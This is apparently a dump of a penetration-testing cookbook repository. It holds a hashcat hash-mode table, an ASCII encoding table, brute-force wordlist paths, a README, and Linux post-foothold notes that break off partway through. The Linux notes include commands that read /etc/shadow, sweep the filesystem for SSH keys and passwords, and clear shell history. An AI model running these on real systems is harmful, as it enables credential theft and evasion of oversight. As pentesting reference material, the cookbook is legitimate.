4500 | sha1(sha1($pass)) | Raw Hash, Salted and/or Iterated
130 | sha1(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
1410 | sha256($pass.$salt) | Raw Hash, Salted and/or Iterated
1420 | sha256($salt.$pass) | Raw Hash, Salted and/or Iterated
22300 | sha256($salt.$pass.$salt) | Raw Hash, Salted and/or Iterated
1440 | sha256($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
20800 | sha256(md5($pass)) | Raw Hash, Salted and/or Iterated
20710 | sha256(sha256($pass).$salt) | Raw Hash, Salted and/or Iterated
1430 | sha256(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
1710 | sha512($pass.$salt) | Raw Hash, Salted and/or Iterated
1720 | sha512($salt.$pass) | Raw Hash, Salted and/or Iterated
1740 | sha512($salt.utf16le($pass)) | Raw Hash, Salted and/or Iterated
1730 | sha512(utf16le($pass).$salt) | Raw Hash, Salted and/or Iterated
19500 | Ruby on Rails Restful-Authentication | Raw Hash, Salted and/or Iterated
50 | HMAC-MD5 (key = $pass) | Raw Hash, Authenticated
60 | HMAC-MD5 (key = $salt) | Raw Hash, Authenticated
150 | HMAC-SHA1 (key = $pass) | Raw Hash, Authenticated
160 | HMAC-SHA1 (key = $salt) | Raw Hash, Authenticated
1450 | HMAC-SHA256 (key = $pass) | Raw Hash, Authenticated
1460 | HMAC-SHA256 (key = $salt) | Raw Hash, Authenticated
1750 | HMAC-SHA512 (key = $pass) | Raw Hash, Authenticated
1760 | HMAC-SHA512 (key = $salt) | Raw Hash, Authenticated
11750 | HMAC-Streebog-256 (key = $pass), big-endian | Raw Hash, Authenticated
11760 | HMAC-Streebog-256 (key = $salt), big-endian | Raw Hash, Authenticated
11850 | HMAC-Streebog-512 (key = $pass), big-endian | Raw Hash, Authenticated
11860 | HMAC-Streebog-512 (key = $salt), big-endian | Raw Hash, Authenticated
11500 | CRC32 | Raw Checksum
14100 | 3DES (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack
14000 | DES (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack
15400 | ChaCha20 | Raw Cipher, Known-Plaintext attack
14900 | Skip32 (PT = $salt, key = $pass) | Raw Cipher, Known-Plaintext attack
11900 | PBKDF2-HMAC-MD5 | Generic KDF
12000 | PBKDF2-HMAC-SHA1 | Generic KDF
10900 | PBKDF2-HMAC-SHA256 | Generic KDF
12100 | PBKDF2-HMAC-SHA512 | Generic KDF
8900 | scrypt | Generic KDF
400 | phpass | Generic KDF
16900 | Ansible Vault | Generic KDF
12001 | Atlassian (PBKDF2-HMAC-SHA1) | Generic KDF
20200 | Python passlib pbkdf2-sha512 | Generic KDF
20300 | Python passlib pbkdf2-sha256 | Generic KDF
20400 | Python passlib pbkdf2-sha1 | Generic KDF
16100 | TACACS+ | Network Protocols
11400 | SIP digest authentication (MD5) | Network Protocols
5300 | IKE-PSK MD5 | Network Protocols
5400 | IKE-PSK SHA1 | Network Protocols
2500 | WPA-EAPOL-PBKDF2 | Network Protocols
2501 | WPA-EAPOL-PMK | Network Protocols
22000 | WPA-PBKDF2-PMKID+EAPOL | Network Protocols
22001 | WPA-PMK-PMKID+EAPOL | Network Protocols
16800 | WPA-PMKID-PBKDF2 | Network Protocols
16801 | WPA-PMKID-PMK | Network Protocols
7300 | IPMI2 RAKP HMAC-SHA1 | Network Protocols
10200 | CRAM-MD5 | Network Protocols
4800 | iSCSI CHAP authentication, MD5(CHAP) | Network Protocols
16500 | JWT (JSON Web Token) | Network Protocols
22600 | Telegram Desktop App Passcode (PBKDF2-HMAC-SHA1) | Network Protocols
22301 | Telegram Mobile App Passcode (SHA256) | Network Protocols
7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth | Network Protocols
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocols
18200 | Kerberos 5, etype 23, AS-REP | Network Protocols
19600 | Kerberos 5, etype 17, TGS-REP | Network Protocols
19700 | Kerberos 5, etype 18, TGS-REP | Network Protocols
19800 | Kerberos 5, etype 17, Pre-Auth | Network Protocols
19900 | Kerberos 5, etype 18, Pre-Auth | Network Protocols
5500 | NetNTLMv1 / NetNTLMv1+ESS | Network Protocols
5600 | NetNTLMv2 | Network Protocols
23 | Skype | Network Protocols
11100 | PostgreSQL CRAM (MD5) | Network Protocols
11200 | MySQL CRAM (SHA1) | Network Protocols
8500 | RACF | Operating System
6300 | AIX {smd5} | Operating System
6700 | AIX {ssha1} | Operating System
6400 | AIX {ssha256} | Operating System
6500 | AIX {ssha512} | Operating System
3000 | LM | Operating System
19000 | QNX /etc/shadow (MD5) | Operating System
19100 | QNX /etc/shadow (SHA256) | Operating System
19200 | QNX /etc/shadow (SHA512) | Operating System
15300 | DPAPI masterkey file v1 | Operating System
15900 | DPAPI masterkey file v2 | Operating System
7200 | GRUB 2 | Operating System
12800 | MS-AzureSync PBKDF2-HMAC-SHA256 | Operating System
12400 | BSDi Crypt, Extended DES | Operating System
1000 | NTLM | Operating System
122 | macOS v10.4, macOS v10.5, MacOS v10.6 | Operating System
1722 | macOS v10.7 | Operating System
7100 | macOS v10.8+ (PBKDF2-SHA512) | Operating System
9900 | Radmin2 | Operating System
5800 | Samsung Android Password/PIN | Operating System
3200 | bcrypt $2*$, Blowfish (Unix) | Operating System
500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5) | Operating System
1500 | descrypt, DES (Unix), Traditional DES | Operating System
7400 | sha256crypt $5$, SHA256 (Unix) | Operating System
1800 | sha512crypt $6$, SHA512 (Unix) | Operating System
13800 | Windows Phone 8+ PIN/password | Operating System
2410 | Cisco-ASA MD5 | Operating System
9200 | Cisco-IOS $8$ (PBKDF2-SHA256) | Operating System
9300 | Cisco-IOS $9$ (scrypt) | Operating System
5700 | Cisco-IOS type 4 (SHA256) | Operating System
2400 | Cisco-PIX MD5 | Operating System
8100 | Citrix NetScaler (SHA1) | Operating System
22200 | Citrix NetScaler (SHA512) | Operating System
1100 | Domain Cached Credentials (DCC), MS Cache | Operating System
2100 | Domain Cached Credentials 2 (DCC2), MS Cache 2 | Operating System
7000 | FortiGate (FortiOS) | Operating System
125 | ArubaOS | Operating System
501 | Juniper IVE | Operating System
22 | Juniper NetScreen/SSG (ScreenOS) | Operating System
15100 | Juniper/NetBSD sha1crypt | Operating System
131 | MSSQL (2000) | Database Server
132 | MSSQL (2005) | Database Server
1731 | MSSQL (2012, 2014) | Database Server
12 | PostgreSQL | Database Server
3100 | Oracle H: Type (Oracle 7+) | Database Server
112 | Oracle S: Type (Oracle 11+) | Database Server
12300 | Oracle T: Type (Oracle 12+) | Database Server
7401 | MySQL $A$ (sha256crypt) | Database Server
200 | MySQL323 | Database Server
300 | MySQL4.1/MySQL5 | Database Server
8000 | Sybase ASE | Database Server
1421 | hMailServer | FTP, HTTP, SMTP, LDAP Server
8300 | DNSSEC (NSEC3) | FTP, HTTP, SMTP, LDAP Server
16400 | CRAM-MD5 Dovecot | FTP, HTTP, SMTP, LDAP Server
1411 | SSHA-256(Base64), LDAP {SSHA256} | FTP, HTTP, SMTP, LDAP Server
1711 | SSHA-512(Base64), LDAP {SSHA512} | FTP, HTTP, SMTP, LDAP Server
10901 | RedHat 389-DS LDAP (PBKDF2-HMAC-SHA256) | FTP, HTTP, SMTP, LDAP Server
15000 | FileZilla Server >= 0.9.55 | FTP, HTTP, SMTP, LDAP Server
12600 | ColdFusion 10+ | FTP, HTTP, SMTP, LDAP Server
1600 | Apache $apr1$ MD5, md5apr1, MD5 (APR) | FTP, HTTP, SMTP, LDAP Server
141 | Episerver 6.x < .NET 4 | FTP, HTTP, SMTP, LDAP Server
1441 | Episerver 6.x >= .NET 4 | FTP, HTTP, SMTP, LDAP Server
101 | nsldap, SHA-1(Base64), Netscape LDAP SHA | FTP, HTTP, SMTP, LDAP Server
111 | nsldaps, SSHA-1(Base64), Netscape LDAP SSHA | FTP, HTTP, SMTP, LDAP Server
7700 | SAP CODVN B (BCODE) | Enterprise Application Software (EAS)
7701 | SAP CODVN B (BCODE) from RFC_READ_TABLE | Enterprise Application Software (EAS)
7800 | SAP CODVN F/G (PASSCODE) | Enterprise Application Software (EAS)
7801 | SAP CODVN F/G (PASSCODE) from RFC_READ_TABLE | Enterprise Application Software (EAS)
10300 | SAP CODVN H (PWDSALTEDHASH) iSSHA-1 | Enterprise Application Software (EAS)
133 | PeopleSoft | Enterprise Application Software (EAS)
13500 | PeopleSoft PS_TOKEN | Enterprise Application Software (EAS)
21500 | SolarWinds Orion | Enterprise Application Software (EAS)
8600 | Lotus Notes/Domino 5 | Enterprise Application Software (EAS)
8700 | Lotus Notes/Domino 6 | Enterprise Application Software (EAS)
9100 | Lotus Notes/Domino 8 | Enterprise Application Software (EAS)
20600 | Oracle Transportation Management (SHA256) | Enterprise Application Software (EAS)
4711 | Huawei sha1(md5($pass).$salt) | Enterprise Application Software (EAS)
20711 | AuthMe sha256 | Enterprise Application Software (EAS)
12200 | eCryptfs | Full-Disk Encryption (FDE)
22400 | AES Crypt (SHA256) | Full-Disk Encryption (FDE)
14600 | LUKS | Full-Disk Encryption (FDE)
13711 | VeraCrypt RIPEMD160 + XTS 512 bit | Full-Disk Encryption (FDE)
13712 | VeraCrypt RIPEMD160 + XTS 1024 bit | Full-Disk Encryption (FDE)
13713 | VeraCrypt RIPEMD160 + XTS 1536 bit | Full-Disk Encryption (FDE)
13741 | VeraCrypt RIPEMD160 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)
13742 | VeraCrypt RIPEMD160 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)
13743 | VeraCrypt RIPEMD160 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)
13751 | VeraCrypt SHA256 + XTS 512 bit | Full-Disk Encryption (FDE)
13752 | VeraCrypt SHA256 + XTS 1024 bit | Full-Disk Encryption (FDE)
13753 | VeraCrypt SHA256 + XTS 1536 bit | Full-Disk Encryption (FDE)
13761 | VeraCrypt SHA256 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)
13762 | VeraCrypt SHA256 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)
13763 | VeraCrypt SHA256 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)
13721 | VeraCrypt SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)
13722 | VeraCrypt SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)
13723 | VeraCrypt SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)
13771 | VeraCrypt Streebog-512 + XTS 512 bit | Full-Disk Encryption (FDE)
13772 | VeraCrypt Streebog-512 + XTS 1024 bit | Full-Disk Encryption (FDE)
13773 | VeraCrypt Streebog-512 + XTS 1536 bit | Full-Disk Encryption (FDE)
13731 | VeraCrypt Whirlpool + XTS 512 bit | Full-Disk Encryption (FDE)
13732 | VeraCrypt Whirlpool + XTS 1024 bit | Full-Disk Encryption (FDE)
13733 | VeraCrypt Whirlpool + XTS 1536 bit | Full-Disk Encryption (FDE)
16700 | FileVault 2 | Full-Disk Encryption (FDE)
20011 | DiskCryptor SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)
20012 | DiskCryptor SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)
20013 | DiskCryptor SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)
22100 | BitLocker | Full-Disk Encryption (FDE)
12900 | Android FDE (Samsung DEK) | Full-Disk Encryption (FDE)
8800 | Android FDE <= 4.3 | Full-Disk Encryption (FDE)
18300 | Apple File System (APFS) | Full-Disk Encryption (FDE)
6211 | TrueCrypt RIPEMD160 + XTS 512 bit | Full-Disk Encryption (FDE)
6212 | TrueCrypt RIPEMD160 + XTS 1024 bit | Full-Disk Encryption (FDE)
6213 | TrueCrypt RIPEMD160 + XTS 1536 bit | Full-Disk Encryption (FDE)
6241 | TrueCrypt RIPEMD160 + XTS 512 bit + boot-mode | Full-Disk Encryption (FDE)
6242 | TrueCrypt RIPEMD160 + XTS 1024 bit + boot-mode | Full-Disk Encryption (FDE)
6243 | TrueCrypt RIPEMD160 + XTS 1536 bit + boot-mode | Full-Disk Encryption (FDE)
6221 | TrueCrypt SHA512 + XTS 512 bit | Full-Disk Encryption (FDE)
6222 | TrueCrypt SHA512 + XTS 1024 bit | Full-Disk Encryption (FDE)
6223 | TrueCrypt SHA512 + XTS 1536 bit | Full-Disk Encryption (FDE)
6231 | TrueCrypt Whirlpool + XTS 512 bit | Full-Disk Encryption (FDE)
6232 | TrueCrypt Whirlpool + XTS 1024 bit | Full-Disk Encryption (FDE)
6233 | TrueCrypt Whirlpool + XTS 1536 bit | Full-Disk Encryption (FDE)
10400 | PDF 1.1 - 1.3 (Acrobat 2 - 4) | Documents
10410 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #1 | Documents
10420 | PDF 1.1 - 1.3 (Acrobat 2 - 4), collider #2 | Documents
10500 | PDF 1.4 - 1.6 (Acrobat 5 - 8) | Documents
10600 | PDF 1.7 Level 3 (Acrobat 9) | Documents
10700 | PDF 1.7 Level 8 (Acrobat 10 - 11) | Documents
9400 | MS Office 2007 | Documents
9500 | MS Office 2010 | Documents
9600 | MS Office 2013 | Documents
9700 | MS Office <= 2003 $0/$1, MD5 + RC4 | Documents
9710 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #1 | Documents
9720 | MS Office <= 2003 $0/$1, MD5 + RC4, collider #2 | Documents
9800 | MS Office <= 2003 $3/$4, SHA1 + RC4 | Documents
9810 | MS Office <= 2003 $3, SHA1 + RC4, collider #1 | Documents
9820 | MS Office <= 2003 $3, SHA1 + RC4, collider #2 | Documents
18400 | Open Document Format (ODF) 1.2 (SHA-256, AES) | Documents
18600 | Open Document Format (ODF) 1.1 (SHA-1, Blowfish) | Documents
16200 | Apple Secure Notes | Documents
15500 | JKS Java Key Store Private Keys (SHA1) | Password Managers
6600 | 1Password, agilekeychain | Password Managers
8200 | 1Password, cloudkeychain | Password Managers
9000 | Password Safe v2 | Password Managers
5200 | Password Safe v3 | Password Managers
6800 | LastPass + LastPass sniffed | Password Managers
13400 | KeePass 1 (AES/Twofish) and KeePass 2 (AES) | Password Managers
11300 | Bitcoin/Litecoin wallet.dat | Password Managers
16600 | Electrum Wallet (Salt-Type 1-3) | Password Managers
21700 | Electrum Wallet (Salt-Type 4) | Password Managers
21800 | Electrum Wallet (Salt-Type 5) | Password Managers
12700 | Blockchain, My Wallet | Password Managers
15200 | Blockchain, My Wallet, V2 | Password Managers
18800 | Blockchain, My Wallet, Second Password (SHA256) | Password Managers
16300 | Ethereum Pre-Sale Wallet, PBKDF2-HMAC-SHA256 | Password Managers
15600 | Ethereum Wallet, PBKDF2-HMAC-SHA256 | Password Managers
15700 | Ethereum Wallet, SCRYPT | Password Managers
22500 | MultiBit Classic .key (MD5) | Password Managers
11600 | 7-Zip | Archives
12500 | RAR3-hp | Archives
13000 | RAR5 | Archives
17200 | PKZIP (Compressed) | Archives
17220 | PKZIP (Compressed Multi-File) | Archives
17225 | PKZIP (Mixed Multi-File) | Archives
17230 | PKZIP (Mixed Multi-File Checksum-Only) | Archives
17210 | PKZIP (Uncompressed) | Archives
20500 | PKZIP Master Key | Archives
20510 | PKZIP Master Key (6 byte optimization) | Archives
14700 | iTunes backup < 10.0 | Archives
14800 | iTunes backup >= 10.0 | Archives
13600 | WinZip | Archives
18900 | Android Backup | Archives
13200 | AxCrypt | Archives
13300 | AxCrypt in-memory SHA1 | Archives
8400 | WBB3 (Woltlab Burning Board) | Forums, CMS, E-Commerce
2611 | vBulletin < v3.8.5 | Forums, CMS, E-Commerce
2711 | vBulletin >= v3.8.5 | Forums, CMS, E-Commerce
2612 | PHPS | Forums, CMS, E-Commerce
121 | SMF (Simple Machines Forum) > v1.1 | Forums, CMS, E-Commerce
3711 | MediaWiki B type | Forums, CMS, E-Commerce
4521 | Redmine | Forums, CMS, E-Commerce
11 | Joomla < 2.5.18 | Forums, CMS, E-Commerce
13900 | OpenCart | Forums, CMS, E-Commerce
11000 | PrestaShop | Forums, CMS, E-Commerce
16000 | Tripcode | Forums, CMS, E-Commerce
7900 | Drupal7 | Forums, CMS, E-Commerce
21 | osCommerce, xt:Commerce | Forums, CMS, E-Commerce
4522 | PunBB | Forums, CMS, E-Commerce
2811 | MyBB 1.2+, IPB2+ (Invision Power Board) | Forums, CMS, E-Commerce
18100 | TOTP (HMAC-SHA1) | One-Time Passwords
2000 | STDOUT | Plaintext
99999 | Plaintext | Plaintext
21600 | Web2py pbkdf2-sha512 | Framework
10000 | Django (PBKDF2-SHA256) | Framework
124 | Django (SHA-1) | Framework
`` Nmap
-- Check if port 8443 is in top 500 ports
~$ sort -r -k3 /usr/share/nmap/nmap-services | head -n 500 | grep 8443
-- How many top ports to include 9443?
~$ sort -r -k3 /usr/share/nmap/nmap-services | grep -n 9443
`` Misc
`` Disable sleep and hibernate
~# systemctl mask sleep.target suspend.target hibernate.target hybrid-sleep.target
`` ASCII
character encoding decimal
NULL %0 0
%1 1
%2 2
%3 3
%4 4
%5 5
%6 6
%7 7
%8 8
TAB %9 9
CR %A 10
%B 11
%C 12
LF %D 13
%E 14
%F 15
%10 16
%11 17
%12 18
%13 19
%14 20
%15 21
%16 22
%17 23
%18 24
%19 25
%1A 26
%1B 27
%1C 28
%1D 29
%1E 30
%1F 31
SPACE %20 32
! %21 33
" %22 34
# %23 35
$ %24 36
% %25 37
& %26 38
' %27 39
( %28 40
) %29 41
* %2A 42
+ %2B 43
, %2C 44
- %2D 45
. %2E 46
/ %2F 47
0 %30 48
1 %31 49
2 %32 50
3 %33 51
4 %34 52
5 %35 53
6 %36 54
7 %37 55
8 %38 56
9 %39 57
: %3A 58
; %3B 59
< %3C 60
= %3D 61
> %3E 62
? %3F 63
@ %40 64
A %41 65
B %42 66
C %43 67
D %44 68
E %45 69
F %46 70
G %47 71
H %48 72
I %49 73
J %4A 74
K %4B 75
L %4C 76
M %4D 77
N %4E 78
O %4F 79
P %50 80
Q %51 81
R %52 82
S %53 83
T %54 84
U %55 85
V %56 86
W %57 87
X %58 88
Y %59 89
Z %5A 90
[ %5B 91
\ %5C 92
] %5D 93
^ %5E 94
_ %5F 95
` %60 96
a %61 97
b %62 98
c %63 99
d %64 100
e %65 101
f %66 102
g %67 103
h %68 104
i %69 105
j %6A 106
k %6B 107
l %6C 108
m %6D 109
n %6E 110
o %6F 111
p %70 112
q %71 113
r %72 114
s %73 115
t %74 116
u %75 117
v %76 118
w %77 119
x %78 120
y %79 121
z %7A 122
{ %7B 123
| %7C 124
} %7D 125
~ %7E 126
&127; %7F 127
€ %80 128
%81 129
‚ %82 130
ƒ %83 131
„ %84 132
… %85 133
† %86 134
‡ %87 135
ˆ %88 136
‰ %89 137
Š %8A 138
‹ %8B 139
Π%8C 140
%8D 141
Ž %8E 142
%8F 143
%90 144
‘ %91 145
’ %92 146
“ %93 147
” %94 148
• %95 149
– %96 150
— %97 151
˜ %98 152
™ %99 153
š %9A 154
› %9B 155
œ %9C 156
%9D 157
ž %9E 158
Ÿ %9F 159
%A0 160
¡ %A1 161
¢ %A2 162
£ %A3 163
¤ %A4 164
¥ %A5 165
¦ %A6 166
§ %A7 167
¨ %A8 168
© %A9 169
ª %AA 170
« %AB 171
¬ %AC 172
%AD 173
® %AE 174
¯ %AF 175
° %B0 176
± %B1 177
² %B2 178
³ %B3 179
´ %B4 180
µ %B5 181
¶ %B6 182
· %B7 183
¸ %B8 184
¹ %B9 185
º %BA 186
» %BB 187
¼ %BC 188
½ %BD 189
¾ %BE 190
¿ %BF 191
À %C0 192
Á %C1 193
 %C2 194
à %C3 195
Ä %C4 196
Å %C5 197
Æ %C6 198
Ç %C7 199
È %C8 200
É %C9 201
Ê %CA 202
Ë %CB 203
Ì %CC 204
Í %CD 205
Î %CE 206
Ï %CF 207
Ð %D0 208
Ñ %D1 209
Ò %D2 210
Ó %D3 211
Ô %D4 212
Õ %D5 213
Ö %D6 214
× %D7 215
Ø %D8 216
Ù %D9 217
Ú %DA 218
Û %DB 219
Ü %DC 220
Ý %DD 221
Þ %DE 222
ß %DF 223
à %E0 224
á %E1 225
â %E2 226
ã %E3 227
ä %E4 228
å %E5 229
æ %E6 230
ç %E7 231
è %E8 232
é %E9 233
ê %EA 234
ë %EB 235
ì %EC 236
í %ED 237
î %EE 238
ï %EF 239
ð %F0 240
ñ %F1 241
ò %F2 242
ó %F3 243
ô %F4 244
õ %F5 245
ö %F6 246
÷ %F7 247
ø %F8 248
ù %F9 249
ú %FA 250
û %FB 251
ü %FC 252
ý %FD 253
þ %FE 254
ÿ %FF 255
================================================
FILE: Notes.Wordlists.txt
================================================
`` Passwords
`` Fast bruteforcing with typical combinations and top lists
- ~/lib/brutas/brutas-passwords-1-xxs.txt
- /usr/share/seclists/Passwords/probable-v2-top1575.txt
- /usr/share/seclists/Passwords/Common-Credentials/500-worst-passwords.txt
`` Medium-weight, may generate too much traffic
- ~/lib/brutas/brutas-passwords-2-xs.txt
- ~/lib/brutas/brutas-passwords-3-s.txt
- /usr/share/seclists/Passwords/probable-v2-top12000.txt
- /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt
`` Heavy lists suitable for offline bruteforcing (> 300k)
- ~/lib/brutas/brutas-passwords-4-m.txt
- ~/lib/brutas/brutas-passwords-5-l.txt
- ~/lib/brutas/brutas-passwords-6-xl.txt
- /usr/share/seclists/Passwords/Leaked-Databases/md5decryptor-uk.txt
`` Usernames
- ~/lib/brutas/brutas-usernames-small.txt
- ~/lib/brutas/brutas-usernames.txt
- /usr/share/seclists/Usernames/top-usernames-shortlist.txt
- /usr/share/wordlists/metasploit/unix_users.txt
- /usr/share/seclists/Usernames/Names/names.txt
`` Domains
`` Light (< 4k)
- ~/lib/brutas/brutas-subdomains-1-small.txt
- /usr/share/seclists/Discovery/DNS/namelist.txt
- /usr/share/dnsenum/dns.txt
`` Heavy (> 100k)
- ~/lib/brutas/brutas-subdomains-2-large.txt
- /usr/share/seclists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt
- /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
- /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
`` Ports
- ~/lib/brutas/brutas-ports-tcp-http.txt
- ~/lib/brutas/brutas-ports-tcp-public.txt
- ~/lib/brutas/brutas-ports-tcp-internal.txt
- /usr/share/seclists/Discovery/Infrastructure/nmap-top1000-ports.txt
`` HTTP paths
- ~/lib/brutas/brutas-http-paths.txt
- /usr/share/dirb/wordlists/common.txt
- /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt
- /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
- /usr/share/wfuzz/wordlist/vulns/cgis.txt
- /usr/share/seclists/Discovery/Web-Content/CGIs.txt
- /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
- /usr/share/seclists/Fuzzing/fuzz-Bo0oM.txt
`` HTTP parameters
- ~/lib/brutas/brutas-http-params.txt
- /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
================================================
FILE: README.md
================================================
# pentesting-cookbook
> A set of recipes useful in pentesting and red teaming scenarios
Snippets, code samples and hints used in penetration tests stored in a single repository so it can be quickly accessed and searched during the assessments.
## Structure
- `bin` Handy utilities to be run locally
- `snippets` All things useful to be run remotely, code snippets, examples etc
- `Notes.*` All sort of helpers, lists and notes not necessarily related to specific service or stage
- `Target.Host.OS.*` - Things that can be done once foothold is established
- `Target.Host.Service.*` - Commands useful in enumeration and exploitation of particular service
- `Target.Network.*` - Commands related to scanning and moving around networks
- `Target.Recon.*` - Typical recon like DNS enumeration, OSINT etc.
## Formatting rules
* If there are more than three levels of hierarchy the file needs to be split.
* Sources (scripts) are located in the `snippets` directory (referenced by `@`).
* Conventions:
* `~` commands
* `@` file references
* `-` lists
* `--` comments (above the commented line)
* OS specific commands:
* `~$` (Linux, defaults to Bash)
* `~#` (Linux - root required)
* `~>` (Windows)
* Shell specific commands:
* `~PS>` (Powershell)
* Variables:
* `VAR_ATTACKER_HOST`
* `VAR_ATTACKER_PORT`
* `VAR_TARGET_DOMAIN`
* `VAR_TARGET_HOST`
* `VAR_TARGET_PORT`
* `VAR_TARGET_CIDR`
* `VAR_TARGET_RANGE`
* `VAR_TARGET_FILE`
* `VAR_USERNAME`
* `VAR_PASSWORD`
* `VAR_NT_HASH`
* `VAR_LM_HASH` (blank LM hash: aad3b435b51404eeaad3b435b51404ee)
* `VAR_STRING`
* `VAR_INTEGER`
* `VAR_HEX`
* `VAR_WORDLIST`
* `VAR_WORDLIST_*` (`VAR_WORDLIST_USERNAME`, `VAR_WORDLIST_PASSWORD` etc)
* `VAR_*_HOST` (`VAR_FTP_HOST`, `VAR_ZOMBIE_HOST`, `VAR_PROXY_HOST` etc)
================================================
FILE: Target.Host.OS.Linux.txt
================================================
`` Initial
`` Upgrade
~$ python -c "import pty; pty.spawn('/bin/bash')"
-- Don't forget Python 3.x might available...
~$ python3 -c "import pty; pty.spawn('/bin/bash')"
~$ ^Z
-- Print rows and cols to be used later (VAR_INTEGER)
~$ stty size
~$ stty raw -echo
~$ fg
~$ export SHELL=bash
~$ export TERM=linux
~$ stty rows VAR_INTEGER cols VAR_INTEGER
`` History
~$ history -c
~$ unset HISTFILE && unset SAVEHIST
`` Paths
~$ export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/ucb/
`` Users
~$ grep -vE "nologin|false|shutdown|halt|sync" /etc/passwd
~$ w
~$ last
`` Permissions
~$ id
~$ sudo -l
~$ sudo su
~$ su -
~$ sudo -i
`` Version
~$ cat /etc/issue
~$ cat /proc/version
~$ cat /etc/*-release
~$ dmesg | grep Linux
~$ ls /boot | grep vmlinuz-
~$ rpm -q kernel
~$ uname -a
`` Enumeration
`` Basic
~$ hostname
~$ cat /etc/debian_version
~$ cat /etc/hosts
~$ cat /etc/issue
~$ cat /etc/passwd
~$ cat /etc/passwd-
~$ cat /etc/redhat-release
~$ cat /etc/shadow
~$ cat /etc/shadow-
~$ cat /root/anaconda-ks.cfg
~$ cat /var/apache2/config.inc
~$ find /etc/ -readable -type f 2>/dev/null
~$ ps faux
~$ cat /etc/network/interfaces
~$ cat /etc/networks
~$ cat /etc/resolv.conf
~$ cat /etc/sysconfig/network
~$ cat /etc/hosts.allow
~$ cat /etc/hosts.deny
~$ cat /etc/inetd.conf
~$ arp -e
~$ cat /proc/net/arp
~$ ifconfig -a
~$ ip a
~$ ss -tun
~$ netstat -ntup
~$ route
~$ df -h
~$ cat /proc/mounts
~$ cat /etc/fstab
~$ cat /etc/exports
~$ dpkg -l
~$ rpm -qa
~$ ls -alh /sbin/
~$ ls -alh /usr/bin/
~$ ls -alh /var/cache/apt/archivesO
~$ ls -alh /var/cache/yum/
~$ cat /etc/crontab
~$ ls -al /etc/ | grep cron
~$ crontab -l
~$ grep "CRON" /var/log/syslog
~$ env
~$ cat /etc/profile
~$ cat /etc/bashrc
~$ cat ~/.*_history
~$ cat ~/.bash_profile
~$ cat ~/.bashrc
~$ cat ~/.bash_logout
~$ ls -la ~/.ssh
`` Extended
~$ cat /var/lib/mysql/mysql/user.MYD
~$ find . -type f -name *.php -exec grep -Hnie 'pass[a-z]*' {} \; 2>/dev/null
~$ find . -type f -name *.rb -exec grep -Hnie 'pass[a-z]*' {} \; 2>/dev/null
~$ find . -type f -name *.py -exec grep -Hnie 'pass[a-z]*' {} \; 2>/dev/null
~$ find . -type f -name *.pl -exec grep -Hnie 'pass[a-z]*' {} \; 2>/dev/null
~$ find . -type f -name authorized_keys 2>/dev/null
~$ find . -type f -name config* 2>/dev/null
~$ find . -type f -name id_dsa 2>/dev/null
~$ find . -type f -name id_rsa 2>/dev/null
~$ find . -type f -name identity 2>/dev/null
~$ find . -type f -name *.doc* 2>/dev/null
~$ find . -type f -name *.key 2>/dev/null
~$ find . -type f -name *.keytab 2>/dev/null
~$ find . -type f -name *.pub 2>/dev/null
~$ find . -type f -name *.rar 2>/dev/null
~$ find . -type f -name *.sql 2>/dev/null
~$ find . -type f -name *.txt 2>/dev/null
~$ find . -type f -name *.xls* 2>/dev/null
~$ find . -type f -name *.zip 2>/dev/null
~$ find . -type f -name *.7z 2>/dev/null
~$ find . -type f -name .bash_history -size +1k 2>/dev/null
~$ grep -Irwn . -ie 'pass[a-z]*\|secret\|admin\|root\|smtp_[a-z]*\|db_[a-z]*' --color=always 2>/dev/null
`` Combo
~$ find . type -f \( -name '*.7z' -o -iname '*.doc*' -o -iname '*.docx' -o -name '*id_dsa' -o -name '*id_rsa' -o -name '*.java' -o -name '*.kdbx' -o -name '*.key' -o -iname '*.php' -o -name '*.py' -o -iname '*.rar' -o -iname '*.txt' -o -iname '*.pdf' -o -iname '*.jpg' -o -iname '*.jpeg' -o -iname '*.tif' -o -iname '*.tiff' -o -iname '*.png' -o -name '*.vsd' -o -iname '*.csv' -o -iname '*.pem' -o -iname '*.crt' -o -iname '*.keytab' -o -iname '*.ppt' -o -iname '*.pptx' -o -iname '*.xls' -o -iname '*.xlss' -o -iname '*.zip' -o -iname '*.ini' \) 2>/dev/null
`` Solaris (SunOS) example
~$ find . -type f -exec /usr/xpg4/bin/grep -E 'pass[a-z]*\|secret\|admin\|root\|smtp_[a-z]*\|db_[a-z]*' {} + 2>/dev/null
`` Permissions
`` Readable by given group in cwd
~$ find . -xdev -type f -group VAR_STRING -perm -g+r -exec ls -lahd {} \; 2>/dev/null
`` Bash history readable by anyone in cwd
~$ find . -xdev -type f -name .bash_history -perm -o+r -exec ls -lahd {} \; 2>/dev/null
`` World-writeable files owned by root in cwd
